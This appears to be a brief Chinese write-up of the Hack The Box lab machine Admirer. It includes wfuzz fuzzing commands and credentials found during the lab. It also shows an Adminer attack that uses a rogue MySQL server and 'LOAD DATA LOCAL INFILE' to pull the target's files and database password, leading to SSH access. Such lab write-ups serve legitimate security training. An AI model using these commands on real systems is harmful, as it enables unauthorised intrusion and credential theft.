不能访问啊
wfuzz一下

wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/big.txt -z list,txt-php-html -u http://10.10.10.187/admin-dir/FUZZ.FUZ2Z --hc 404,403 -t 100


三个账号

先看ftp
得到两个文件
压缩包里是网站源码

waldo:Wh3r3_1s_w4ld0?

wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/big.txt -z list,php-txt-html --hc 403,404 -t 100 -u http://10.10.10.187/utility-scripts/FUZZ.FUZ2Z


失败了
利用原理

CREATE DATABASE admirer;
CREATE USER 'demo'@'%' IDENTIFIED BY 'demo_admirer';
GRANT ALL PRIVILEGES ON * . * TO 'demo'@'%';
FLUSH PRIVILEGES;
create table lez(data VARCHAR(255));

vim /etc/mysql/mariadb.conf.d/50-server.cnf
systemctl restart mysql


登录进来了

load data local infile '../index.php'
into table admirer.lez
fields terminated by '/n'

得到密码
waldo:&<h5b~yK3F#{PaPB&dA}{H>

ssh登录成功




Hack the box靶机 Admirer相关推荐

  1. Hack The Box靶机——Ambassador

    文章目录 前言 一.Web部分 二.提权部分 前言 难度:中等,Hack The Box网站在线靶机.本文涉及知识点有:Grafana系统任意文件读取,CURL下载文件,SSL本地端口转发,Consu ...

  2. Hack the box靶机 October

    搜了一下october 有漏洞 然后默认的后台是/backend 试了一下密码admin:admin 竟然进去了???? 有文件上传功能 shel.php 抓包 改成*.php5 右侧click he ...

  3. Hack the box靶机 Grandpa

    migrate进程迁移 win的题怎么都是用msf做的呢 看大佬们没有不用msf的

  4. Hack the box靶机 Chatterbox

    修改地址 把生成的字符串替换python里的

  5. Hack the box靶机 Soli

    突破口是oracle 就是真的慢 我快吐了 scott/tiger 不知道为什么老是连接不上 给我整不会了 但是我重启了一下 换了一个端口 然后就好了

  6. Hack The Box——Traverxec

    目录 简介 信息收集 漏洞发现 漏洞利用 权限提升 内核提权 SUID提权 总结 简介 这个靶机还算比较简单,只需一步一步慢慢走下去就可以完成了.漏洞发现和利用都比较简单,使用已知漏洞可以直接获得we ...

  7. Hack The Box - Meta 利用Exiftool远程代码执行漏洞获取webshell,ImageMagrick命令执行漏洞横向提权,更改环境配置SUDO纵向提权

    Hack The Box - Meta Hack The Box开始使用流程看这篇 文章目录 Hack The Box - Meta 整体思路 1.Nmap扫描 2.Exiftool远程代码执行漏洞( ...

  8. Hack The Box - Catch 利用let chat API查询信息,Cachet配置泄露漏洞获取ssh登录密码,apk代码注入漏洞利用获取root权限

    Hack The Box-Catch Hack The Box开始使用流程看这篇 文章目录 Hack The Box-Catch 整体思路 1.Nmap扫描 2.apk文件信息收集 3.lets ch ...

  9. Hack The Box - Starting Point - TIER 0

    Hack The Box - Starting Point - TIER 0 Meow TASK 1 What does the acronym VM stand for? 首字母缩略词 VM 代表什 ...

最新文章

  1. 短视频的生成,不要在技术上想当然
  2. python代码画图案-python基本图形绘制
  3. 堆栈的定义与操作-顺序存储,链式存储(C语言)
  4. 修改mysql表的存储引擎
  5. a pycharm 标记多个_每周分享五个 PyCharm 使用技巧(二)
  6. matlab如何进行数字信号处理,数字信号处理基础及MATLAB实现(第2版)
  7. C++中常用字符串相关的编程题
  8. 数学建模学习笔记(七)——图论最短路问题
  9. 更新jupyter lab
  10. 我这么玩Web Api(一):帮助页面或用户手册(Microsoft and Swashbuckle Help Page)
  11. 网络安全系列之四十 在Linux中设置SET位权限
  12. std list/vector sort 自定义类的排序就是这么简单
  13. soul软件的简单分析
  14. 爬虫字体替换(一)天眼查
  15. python- 小猫钓鱼纸牌游戏
  16. Allegro如何更改铜皮的网络操作指导
  17. ORB、SURF、SIFT特征点提取方法和ICP匹配方法
  18. 自适应网页设计(Responsive Web Design)别名(响应式web设计、响应式布局)
  19. stm32捕获占空比_【电机控制】六步法驱动BLDC电机,使用硬件COM事件,STM32+CUBEMX(HAL库)配置...
  20. Transformer for image quality assessment阅读笔记

热门文章

  1. 24个Web前端人员不能错过的在线检测网站汇总
  2. Win10远程桌面及防火墙配置
  3. 十一月月底总结及十二月展望
  4. Block 基本使用介绍
  5. 社会内卷的真正原因:华为内部论坛的这篇雄文火了
  6. 空间数据可视化神器,Pydeck!
  7. BCG网格控件单独设置颜色
  8. 【程序设计】C语言程序设计基础教材题解
  9. Android VideoView 无法播放https网络视频问题
  10. 学完计算机网络基础及应用的感想,学习《计算机网络基础知识》心得体会